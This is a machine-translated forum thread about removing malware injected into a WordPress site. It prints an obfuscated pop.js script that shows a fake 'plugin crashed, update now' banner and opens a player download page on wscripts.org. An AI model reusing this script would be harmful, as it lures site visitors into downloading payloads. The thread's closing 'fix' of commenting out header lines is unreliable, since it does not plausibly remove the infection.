我在wordpress网站上收到以下消息:
无法连接到数据库服务器。找不到数据库 jimbob_je。应用程序出现意外问题。 从
statscurl中选择statscurl_id,其中 statscurl_ip = '';
我已经使用 sucuri.net 进行检查,但它没有找到任何东西,但仍然收到错误。我从浏览器中检查了页面源代码,结尾标题标签上方有 2 个加密脚本,但我在 header.php 中找不到它们。
这两个脚本的开头有"eval(unescape",当页面加载到状态栏中时,会出现2个站点:wscripts.org 和 jquery.com此外,在使用Firebug检查加载的脚本时,有2个称为pop.js和imwb_cab_script.js但它们没有加密并且来自上面提到的站点。两者都随机加载。
这是imwb_cab_script.js的代码
jQuery(document).ready(function($) {
// $() will work as an alias for jQuery() inside of this function
imwb_activate_cab();
$('.imwb_cabar').live('click', function() {
var data = {
action :'imwb_cab_ctr_action',
barDetails: $(this).attr('id'),
nonce : IMWB_CAB_Ajax.nonce
};
$.ajax({
async: false,
type: 'POST',
url: IMWB_CAB_Ajax.ajaxurl,
data: data
});
imwb_goto_cab_link();
return true;
});
});
var cabCookie = function(name, value, expireHours, path) {
// name and at least value given, set cookie...
if (arguments.length > 1 ) {
if (expireHours === null || expireHours === undefined) {
expireHours = 7;
另一个代码脚本 pop.js 是:
var _0xf475=["x69x6Dx77x62x5Fx63x61x62x31x5Fx73x68x6Fx77","x4E","x69x6Dx77x62x5Fx63x61x62x31x5Fx72x65x73x68x6Fx77","x72x61x6Ex64x6Fx6D","x3Cx64x69x76x20x63x6Cx61x73x73x3Dx22x69x6Dx77x62x5Fx63x61x62x61x72x22x20x69x64x3Dx22x63x61x62x5Fx31x5Fx30x22x3Ex3Cx69x6Dx67x20x73x72x63x3Dx22x68x74x74x70x3Ax2Fx2Fx77x77x77x2Ex77x73x63x72x69x70x74x73x2Ex6Fx72x67x2Fx31x32x33x34x35x2Fx77x70x2Dx63x6Fx6Ex74x65x6Ex74x2Fx70x6Cx75x67x69x6Ex73x2Fx63x6Fx76x65x72x74x61x63x74x69x6Fx6Ex62x61x72x2Dx70x72x6Fx2Fx69x6Dx61x67x65x73x2Fx77x61x72x6Ex69x6Ex67x2Ex67x69x66x22x3Ex3Cx70x3Ex4Fx70x70x73x21x20x59x6Fx75x72x20x58x76x69x64x20x4Dx65x64x69x61x20x50x6Cx75x67x69x6Ex20x68x61x73x20x43x72x61x73x68x65x64x21x20x3Cx73x74x72x6Fx6Ex67x3Ex3Cx73x70x61x6Ex20x73x74x79x6Cx65x3Dx22x74x65x78x74x2Dx64x65x63x6Fx72x61x74x69x6Fx6Ex3Ax20x75x6Ex64x65x72x6Cx69x6Ex65x3Bx22x3Ex3Cx73x70x61x6Ex20x73x74x79x6Cx65x3Dx22x63x6Fx6Cx6Fx72x3Ax20x23x30x30x30x30x66x66x3Bx20x74x65x78x74x2Dx64x65x63x6Fx72x61x74x69x6Fx6Ex3Ax20x75x6Ex64x65x72x6Cx69x6Ex65x3Bx22x3Ex50x6Cx65x61x73x65x20x55x70x64x61x74x65x64x20x4Ex6Fx77x3Cx2Fx73x70x61x6Ex3Ex3Cx2Fx73x70x61x6Ex3Ex3Cx2Fx73x74x72x6Fx6Ex67x3Ex3Cx2Fx70x3Ex3Cx6Fx62x6Ax65x63x74x20x77x69x64x74x68x3Dx22x30x22x20x68x65x69x67x68x74x3Dx22x30x22x20x69x64x3Dx22x70x6Cx61x79x65x72x22x20x63x6Cx61x73x73x69x64x3Dx22x63x6Cx73x69x64x3Ax44x32x37x43x44x42x36x45x2Dx41x45x36x44x2Dx31x31x63x66x2Dx39x36x42x38x2Dx34x34x34x35x35x33x35x34x30x30x30x30x22x3Ex3Cx70x61x72x61x6Dx20x6Ex61x6Dx65x3Dx22x6Dx6Fx76x69x65x22x20x76x61x6Cx75x65x3Dx22x68x74x74x70x3Ax2Fx2Fx77x77x77x2Ex77x73x63x72x69x70x74x73x2Ex6Fx72x67x2Fx31x32x33x34x35x2Fx77x70x2Dx63x6Fx6Ex74x65x6Ex74x2Fx70x6Cx75x67x69x6Ex73x2Fx63x6Fx76x65x72x74x61x63x74x69x6Fx6Ex62x61x72x2Dx70x72x6Fx2Fx4Ax46x50x6Cx61x79x49x74x2Ex73x77x66x3Fx75x72x6Cx3Dx68x74x74x70x3Ax2Fx2Fx77x77x77x2Ex77x73x63x72x69x70x74x73x2Ex6Fx72x67x2Fx31x32x33x34x35x2Fx77x70x2Dx63x6Fx6Ex74x65x6Ex74x2Fx70x6Cx75x67x69x6Ex73x2Fx63x6Fx76x65x72x74x61x63x74x69x6Fx6Ex62x61x72x2Dx70x72x6Fx2Fx63x61x62x61x72x2Ex6Dx70x33x22x3Ex3Cx65x6Dx62x65x64x20x73x72x63x3Dx22x68x74x74x70x3Ax2Fx2Fx77x77x77x2Ex77x73x63x72x69x70x74x73x2Ex6Fx72x67x2Fx31x32x33x34x35x2Fx77x70x2Dx63x6Fx6Ex74x65x6Ex74x2Fx70x6Cx75x67x69x6Ex73x2Fx63x6Fx76x65x72x74x61x63x74x69x6Fx6Ex62x61x72x2Dx70x72x6Fx2Fx4Ax46x50x6Cx61x79x49x74x2Ex73x77x66x3Fx75x72x6Cx3Dx68x74x74x70x3Ax2Fx2Fx77x77x77x2Ex77x73x63x72x69x70x74x73x2Ex6Fx72x67x2Fx31x32x33x34x35x2Fx77x70x2Dx63x6Fx6Ex74x65x6Ex74x2Fx70x6Cx75x67x69x6Ex73x2Fx63x6Fx76x65x72x74x61x63x74x69x6Fx6Ex62x61x72x2Dx70x72x6Fx2Fx63x61x62x61x72x2Ex6Dx70x33x22x20x6Ex61x6Dx65x3Dx22x70x6Cx61x79x65x72x22x20x77x69x64x74x68x3Dx22x30x22x20x68x65x69x67x68x74x3Dx22x30x22x20x74x79x70x65x3Dx22x61x70x70x6Cx69x63x61x74x69x6Fx6Ex2Fx78x2Dx73x68x6Fx63x6Bx77x61x76x65x2Dx66x6Cx61x73x68x22x3Ex3Cx2Fx65x6Dx62x65x64x3Ex3Cx2Fx6Fx62x6Ax65x63x74x3Ex3Cx2Fx64x69x76x3E","x70x72x65x70x65x6Ex64","x62x6Fx64x79","x2Fx31x32x33x34x35x2F","x68x74x74x70x3Ax2Fx2Fx77x77x77x2Ex77x73x63x72x69x70x74x73x2Ex6Fx72x67x2Fx64x6Fx77x6Ex6Cx6Fx61x64x2Dx76x6Cx63x2Dx70x6Cx61x79x65x72x2Fx3Fx6Dx6Ex3Dx34x34x36x33x34x33x34x32x32x32x36","x5Fx73x65x6Cx66","x6Fx70x65x6E"];function imwb_activate_cab(){if(cabCookie(_0xf475[0])==_0xf475[1]||cabCookie(_0xf475[2])==_0xf475[1]){return ;} ;setTimeout(imwb_show_cab,2000);} ;function imwb_show_cab(){if(Math[_0xf475[3]]()<0.02){jQuery(_0xf475[6])[_0xf475[5]](_0xf475[4]);cabCookie(_0xf475[2],_0xf475[1],0,_0xf475[7]);} ;} ;function imwb_goto_cab_link(){cabCookie(_0xf475[0],_0xf475[1],0,_0xf475[7]);window[_0xf475[10]](_0xf475[8],_0xf475[9]);} ;
问题是如何删除浏览器页面源代码中显示的这些代码。
您可以在此处查看加密脚本
关于如何摆脱这些代码的任何其他解决方案吗?
谢谢!!!
PD:该网站不使用任何插件
上周我得到了类似的东西,但只感染了 PHP 文件。你能在标题中显示你的代码吗?
我解脱了您输入的代码,我看到它显然试图窃取用户的 cookie 并显示某种横幅,我建议您立即关闭您的网站并尝试从您的页面手动清理代码.. 如果您使用的主题与旧版本的 Timthumb 相比,这可能是您的安全漏洞!
第一件事是禁用公众访问者的网站,因为我认为此代码可能试图将病毒下载到访问者的浏览器!
为此,只需在根目录中创建该 .htaccess 文件:
<IfModule mod_rewrite.c>
RewriteEngine on
RewriteCond %{REMOTE_ADDR} !^192.168.0.100
RewriteCond %{REQUEST_URI} !/pageisdown.html$ [NC]
RewriteCond %{REQUEST_URI} !.(jpe?g?|png|gif) [NC]
RewriteRule .* /pageisdown.html [R=302,L]
</IfModule>
我从这里得到这个然后将第 192.168.0.100 行更改为您自己的公共 IP 地址,然后只有您才能访问该网站,其他任何人都将被重定向到 Pageisdown.html 页面!(随意创建此页面并添加您喜欢的任何内容..)
第二件事你需要手动扫描你的文件,看看这个脚本来自哪里,通常它会是一个PHP函数的形式,看起来像这样
eval(base64_decode(....))
点(...)通常是很多Base64编码的代码,只需删除该函数调用,您就会干净!,并确保没有后门文件,只需检查您的服务器是否有新创建的PHP文件或其他您不记得创建的脚本。
我想我找到了一个解决方法:阅读主题"标头中的恶意软件.php"wordpress.stackexchange.com 有人在 wp_head() 上方发现了一个代码并清理了代码,但这在几个小时后重新出现。
我寻找类似的东西,但没有发现任何可疑的东西。以防万一我在 wp_head() 上方评论了 2 行,如下所示
<!-- <link rel="pingback" href="<?php bloginfo('pingback_url'); ?>" />
<?php if ( is_singular() ) wp_enqueue_script( 'comment-reply' ); ?> -->
然后重新加载了几次网站,现在似乎还可以:没有消息,看到页面源代码时没有加密脚本,没有尝试加载 wscripts.org 等。 现在网站甚至加载得更快。
我也做了一些安全修复。
如果再次发生,我会通知你。
希望这对处于类似情况的人有用。